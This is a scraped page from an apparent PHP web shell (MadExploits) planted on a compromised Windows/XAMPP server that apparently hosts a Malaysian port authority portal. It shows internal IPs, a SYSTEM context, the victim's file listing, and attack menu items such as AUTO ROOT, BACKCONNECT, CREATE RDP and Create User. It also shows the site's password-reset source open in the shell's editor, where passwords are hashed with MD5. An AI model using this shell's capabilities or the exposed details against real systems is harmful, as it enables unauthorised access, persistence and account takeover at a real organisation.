Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens_220424 /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxrwx
edg
[ DIR ]
drwxrwxrwx
edg_200430
[ DIR ]
drwxrwxrwx
edg_20200630
[ DIR ]
drwxrwxrwx
edg_o
[ DIR ]
drwxrwxrwx
edg_old
[ DIR ]
drwxrwxrwx
extension
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
inc
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
kod
[ DIR ]
drwxrwxrwx
upload
[ DIR ]
drwxrwxrwx
utility
[ DIR ]
drwxrwxrwx
!test.php
17
B
-rw-rw-rw-
Nota14102020.docx
22.8
KB
-rw-rw-rw-
access.php
253
B
-rw-rw-rw-
access2.php
245
B
-rw-rw-rw-
account_recovery.php
6.56
KB
-rw-rw-rw-
ajax.php
2.43
KB
-rw-rw-rw-
custom.css
3.35
KB
-rw-rw-rw-
custom.js
7.03
KB
-rw-rw-rw-
custom200630.js
6.46
KB
-rw-rw-rw-
custom_200630.css
1.04
KB
-rw-rw-rw-
custom_200705.js
6.82
KB
-rw-rw-rw-
custom_210125.css
2.22
KB
-rw-rw-rw-
dashboard.php
21.63
KB
-rw-rw-rw-
dashboard_old.php
51
B
-rw-rw-rw-
dglist.php
3.97
KB
-rw-rw-rw-
err_404.php
75
B
-rw-rw-rw-
index.php
2.49
KB
-rw-rw-rw-
licenses.php
103
B
-rw-rw-rw-
login.php
9.8
KB
-rw-rw-rw-
login_o.php
9.81
KB
-rw-rw-rw-
main.php
584
B
-rw-rw-rw-
microsoft.php
214.77
KB
-rw-rw-rw-
odbc.php
12.43
KB
-rw-rw-rw-
odbc_212801.php
12.77
KB
-rw-rw-rw-
recover_msg.php
806
B
-rw-rw-rw-
reset_password.php
8.84
KB
-rw-rw-rw-
sessions.php
2.04
KB
-rw-rw-rw-
sessions_200705.php
1.4
KB
-rw-rw-rw-
sessions_200721.php
1.75
KB
-rw-rw-rw-
test_sess.php
1.35
KB
-rw-rw-rw-
testinput.php
6.7
KB
-rw-rw-rw-
~$ta14102020.docx
162
B
-rw-rw-rw-
~WRL0738.tmp
23.29
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : reset_password.php
<?php if(empty($page)){ include("access2.php"); } ?> <?php include 'inc/config.php'; ?> <?php include 'inc/template_start.php'; ?> <?php include 'inc/template_scripts.php'; ?> <script type="text/javascript" src="custom.js"></script> <script type="text/javascript"> $(document).ready(function(){ $.testme = function(x,y){ var typ = ''; if(x == '1') typ = "success"; else if(x == '2') typ = "warning"; else typ = "danger"; $.bootstrapGrowl('<h4><strong>Notification</strong></h4> <p>'+y+'</p>', { type: typ, delay: 3000, allow_dismiss: true, offset: {from: 'top', amount: 20} }); }; }); </script> <?php growl_me($_SESSION,$g_success); require 'extension/PHPMailer-master/src/Exception.php'; require 'extension/PHPMailer-master/src/PHPMailer.php'; require 'extension/PHPMailer-master/src/SMTP.php'; use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\Exception; use PHPMailer\PHPMailer\SMTP; $success = 0; $token = $_GET['token']; $has_succ = $_GET['success']; if($_POST): $sql = "SELECT a.* FROM user_list a WHERE 1 AND a.recovery_token = ? AND a.recovery_exp >= now()"; $param_data = array( "token" => $token ); $data = mysqli_prepare_all($sql,$param_type = "auto",$param_data); if(!empty($data->fetch_assoc())){ $sql = " UPDATE user_list SET passwordUser = ?, recovery_token = '' WHERE recovery_token = ? "; $param_type = "ss"; $param_data = array( "passwordUser" => md5($_POST['val-password']), "recovery_token" => $token ); $data = mysqli_prepare_audit($sql,$param_type,$param_data,"Password Reset By Recovery Token"); // $msg = "RECORD UPDATED!"; $success = 1; $_SESSION['success'] = $success; $_SESSION['success_msg'] = "Password successfully changed."; }else{ $success = 3; $_SESSION['success'] = $success; $_SESSION['success_msg'] = "Token expired / Doesn't Exits."; } echo "<script>window.location.replace('index.php?page=reset_password&success={$success}');</script>"; exit(); endif; // if() ?> <div id="page-content"> <div class="row"> <div class="col-sm-12"> <div class="widget-image widget-image-xs"> <img src="img/lpkmn/bg.jpg" alt="image"> <div class="widget-image-content"> <div class="pull-right text-light-op"> <strong> <form id="form-login" method="post" action="login.php" class="form-inline"> <div class="form-group"> <div class="row"> <div class="col-md-12"> <input type="text" id="login-user" name="login-user" class="form-control" placeholder="Your email.."> <!-- <div style="display: block;position:absolute;right:18px;margin: 2px"><i><u>New Register</u></i></div> --> </div> </div> </div> <div class="form-group"> <div class="row"> <div class="col-md-12"> <input type="password" id="login-password" name="login-password" class="form-control" placeholder="Your password.."> <div style="display: block;position:absolute;right:18px;margin: 2px"><i><a style="cursor: pointer;color: #CCC" href="index.php?page=account_recovery">Forgot Password</a></i></div> </div> </div> </div> <div class="form-group form-actions"> <button type="submit" class="btn btn-effect-ripple btn-sm btn-primary"><i class="fa fa-unlock-alt"></i> Login</button> </div> </form> </strong> </div> <h2 class="widget-heading text-light"><strong>eDGPENS LPKMn</strong></h2> <h3 class="widget-heading text-light-op">Lembaga Pelabuhan Kemaman</h3> </div> </div> </div> </div> <!-- [QUERY_STRING] --> <?php $sql = "SELECT a.* FROM user_list a WHERE 1 AND a.recovery_token = ? AND a.recovery_exp >= now()"; $param_data = array( "recovery_token" => $token ); $data = mysqli_prepare_all($sql,$param_type = "auto",$param_data); if(!empty($data->fetch_assoc()) && !empty($token)){ ?> <!-- Login Container --> <div id="container" style="position: relative;top:20px"> <!-- Login Block --> <div class="row"> <div class="col-lg-6 col-lg-offset-3 col-md-12" > <div class="block animation-fadeInQuickInv"> <!-- Login Title --> <div class="block-title"> <h2>Change Your Password</h2> </div> <!-- END Login Title --> <!-- Login Form --> <form class="form-horizontal form-bordered" id="form-validation" method="post"> <!-- if delete. check post name delete --> <div class="form-group"> <label class="col-md-3 control-label" for="val-password">Password <span class="text-danger">*</span></label> <div class="col-md-7"> <input type="password" id="val-password" name="val-password" class="form-control validation" data-validation="password1" placeholder="Choose a good one.."> </div> </div> <div class="form-group"> <label class="col-md-3 control-label" for="val-confirm-password">Confirm Password <span class="text-danger">*</span></label> <div class="col-md-7"> <input type="password" id="val-confirm-password" name="val-confirm-password" class="form-control validation" data-validation="password2" placeholder="..and confirm it to be safe!"> </div> </div> <div class="form-group form-actions"> <div class="col-md-7 col-md-offset-3"> <button type="submit" class="btn btn-effect-ripple btn-primary">Submit</button> </div> </div> <input type="hidden" name="type_submit" value="edit"> <input type="hidden" name="val-id" value="<?php echo $user['idUser']; ?>"> <!-- <h4 class="pull-left">$ <strong class="text-primary-dark">689</strong><small>.00</small></h4> --> </form> </div> </div> </div> </div> <script src="js/pages/formsValidation.js"></script> <script type="text/javascript"> $(document).ready(function(){ $("#form-validation").setvalidation(""); $("#form-validation > [name='type_submit']").val("edit"); $("#val-password").on("trigger_me",function(e){ var trgt = $(this); if(trgt.val().length >= 8){ var numbers = /^[0-9]+$/i; var letters = /^[a-zA-Z]+$/i; var result = false; var valid = false; if(letters.test(trgt.val())) result = true; if(numbers.test(trgt.val())) result = true; trgt.parent().find(".help-block2").remove(); if(result){ trgt.after("<div id=\"val-password-error\" class=\"help-block2 \" style='margin-top:8px;font-weight:400;font-style:italic;color: #de815c'>Your password must be at least 8 characters long and must not contain all numbers or characters</div>"); trgt.closest(".form-group").addClass("has-error2"); return false; }else{ trgt.parent().find(".help-block2").remove(); trgt.closest(".form-group").removeClass("has-error2"); } }else{ trgt.parent().find(".help-block2").remove(); trgt.closest(".form-group").removeClass("has-error2"); } }); $("#val-password").on("keyup",function(e){ $(this).trigger("trigger_me"); }); }); </script> </div> <?php }else{ ?> <!-- Login Container --> <div id="container" style="position: relative;top:20px"> <!-- Login Block --> <div class="row"> <div class="col-lg-6 col-lg-offset-3 col-md-12" > <div class="block animation-fadeInQuickInv"> <!-- Login Title --> <div class="block-title"> <h2>Change Your Password</h2> </div> <?php if($has_succ !== '1'){ ?> <div class="alert alert-danger"> <div class="widget-content themed-backgroundx-passion text-left clearfix"> <i class="pull-left fa fa-warning" style="font-size: 55pt"></i> <h4 class="widget-heading text-light">Token Has Expired / Not Valid.</h3> <h4 class="widget-heading text-light-op">Request Again To Proceed <a style="color:white;font-weight:bold" href="index.php?page=account_recovery" target="_self">Here</a></h4> </div> </div> <?php }else{ ?> <div class="alert alert-success"> <div class="widget-content themed-backgroundx-passion text-left clearfix"> <i class="pull-left fa fa-check" style="font-size: 55pt"></i> <h4 class="widget-heading text-light">Password successfully changed.</h3> <h4 class="widget-heading text-light-op">You Can Try Login Again.</h4> </div> </div> <?php }?> </div> </div> <?php } ?> <!-- END Login Container --> <?php // include 'inc/template_scripts.php'; ?> <!-- Load and execute javascript code used only in this page --> <script src="js/pages/readyLogin.js"></script> <script>$(function(){ ReadyLogin.init(); });</script> <?php include 'inc/template_end.php'; ?>
Close